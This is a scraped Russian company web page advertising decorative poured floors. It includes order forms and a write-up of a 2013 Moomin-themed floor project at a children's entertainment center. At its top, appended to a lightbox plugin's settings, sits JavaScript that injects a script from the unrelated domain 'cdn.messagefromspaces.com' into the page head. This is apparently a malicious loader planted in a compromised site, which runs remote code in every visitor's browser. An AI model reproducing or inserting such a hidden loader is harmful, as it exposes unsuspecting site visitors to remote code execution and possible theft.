, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); } var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Заказать услуги онлайн




Заполните форму ниже, чтоби оставить заявку на наши услуги или продукцию. Наши специалисты обязательно свяжутся с Вами в ближайшее время!

Поля, помеченные *,обязательны для заполнения


Имя

заказ  

телефон*

Перезвонить Вам?




Закажите БЕСПЛАТНЫЙ обратный звонок нашего специалиста, и он обязательно свяжется с Вами в ближайшее время

Поля, помеченные *, обязательны для заполнения

Ваше имя

Номер телефона*

(812) 372-67-66

Москва

(495) 638-52-50

Санкт-Петербург

(812) 372-67-66


Декоративный наливной пол в ДРЦ «Дубы-Колдуны»

В преддверии нового 2013 года наша компания завершила очередной проект — декоративный наливной пол в детском развлекательном центре «Дубы-Колдуны» в т/ц «Июнь». Центром был запланирован новогодний праздник «В гостях у Муми-троллей». Сделанный нами пол помог создать атмосферу яркой и незабываемой сказки. Путешествуя по Муми-стране, дети были в восторге.

Домики Муми-тролля, Муми-папы и Муми-мамы казались волшебными. Дети с радостью бегали от домика к домику по «лесной тропинке», бродили с троллями по «поляне опавших дубовых листьев», воссоздать реальность которых помогли наливные 3D полы. А когда для маленьких ребятишек началось представление в «Театре теней», поверхность пола превратилась в элемент игры.

Неповторимая игра света и тени, отражаясь в глянце, перевоплотила его в нечто фантастическое и таинственное. Он, словно под действием магии, стал частью сказочного мира троллей. Казалось, наливные полы действительно ожили, создавая неповторимую и праздничную атмосферу для детей. Но состояние восторга было не только у маленьких зрителей. Одновременное сочетание сразу трех видов декоративных наливных полов («живой», с рисунком, 3D) вызвало интерес и восхищение у родителей.

Они с не меньшим удовольствием рассматривали созданную нашими мастерами красоту, получая эстетическое удовольствие. Кроме того, отсутствие швов на полах, их экологичность и пылеотталкивающее свойство, позволило родителям избежать лишних волнений за здоровье своих чад в интерактивные моменты праздника, когда дети дружной ватагой проползали под столом Муми-семьи или крутили штурвал лодки Муми-папы.  Мы же, в свою очередь, искренне рады, что наш проект помог создать сказочную атмосферу новогоднего праздника для малышей, и они еще не один раз пройдутся своими ножками по «лесной тропинке».